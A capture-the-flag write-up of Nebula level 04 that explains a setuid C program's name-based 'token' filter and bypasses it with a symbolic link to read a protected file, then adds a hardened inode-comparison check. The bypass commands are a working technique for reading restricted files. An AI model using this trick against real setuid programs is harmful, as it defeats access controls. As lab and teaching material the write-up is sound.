Nebula Level 04

Level 04 instructions

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>   /* declares err() */
int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {                          /* no file name given */
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {   /* looks at the name only, not the file */
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
  return 0;
}

So another C program to fool. On line 13 the program makes sure that it is launched with one command line parameter. If it isn’t, the program prints instructions and exits. Line 18 uses strstr to check for the substring “token” in the command line argument. If “token” is found, the program replies with “You may not access” and exits. If “token” isn’t found, the program continues and tries to open the file named by the argument. If the file is found and can be accessed, it is read and its contents are printed.

The instructions state that the files are in /home/flag04/

cd /home/flag04
ls -al
total 13
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root     120 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token

If I try executing the program to read token it exits as expected.

./flag04 token
You may not access 'token'

I don’t have read or write access to the token file, so I can’t read its contents or rename it. Instead I create a new symbolic link, which is basically just a shortcut to the file. Since my link doesn’t have “token” in the name, the program doesn’t fail its check and reads the file. I can’t create the link in the flag04 directory due to permissions, so I create it in my own home folder.

ln -s /home/flag04/token ~/new_link
./flag04 ~/new_link
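
The defensive counterpart, as an added example that is not part of the original write-up or the level's code: flag04 checks the name that was typed, while the C below checks the file that was actually opened by comparing its device and inode with the protected file. It goes beyond the symbolic link used above by also covering hard links; the function names, the scratch directory under /tmp and the sample files are assumptions constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The level's check: inspects only the name the caller typed. */
int name_check_allows(const char *path) { return strstr(path, "token") == NULL; }

/* Hardened check (hypothetical helper): compare the identity of the open
 * descriptor with the protected file. Any alias resolves to the same inode. */
int fd_is_protected(int fd, const char *protected_path)
{
    struct stat got, prot;
    if (fstat(fd, &got) == -1 || stat(protected_path, &prot) == -1)
        return 1; /* fail closed when either file cannot be inspected */
    return got.st_dev == prot.st_dev && got.st_ino == prot.st_ino;
}

/* Constructed demo: a stand-in token, a symlink and a hard link to it, and an
 * unrelated file. Bit i of the result is set when path i was let through. */
int demo(int hardened)
{
    char dir[] = "/tmp/l04demoXXXXXX", p[4][64];
    const char *names[4] = { "sym_link", "hard_link", "notes", "token" };
    int i, fd, mask = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    for (i = 0; i < 4; i++)
        snprintf(p[i], sizeof p[i], "%s/%s", dir, names[i]);
    for (i = 2; i < 4; i++)
        close(open(p[i], O_CREAT | O_WRONLY, 0600));
    if (symlink(p[3], p[0]) == -1 || link(p[3], p[1]) == -1)
        return -1;
    for (i = 0; i < 3; i++) {
        fd = open(p[i], O_RDONLY);
        if (hardened ? !fd_is_protected(fd, p[3]) : name_check_allows(p[i]))
            mask |= 1 << i;
        close(fd);
    }
    for (i = 0; i < 4; i++)
        unlink(p[i]);
    rmdir(dir);
    return mask;
}

int main(void) { printf("%d %d\n", demo(0), demo(1)); return 0; }
```

Because the comparison is made on the descriptor that is already open, the path cannot be swapped between the check and the read.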

Five levels down. Fifteen to go!
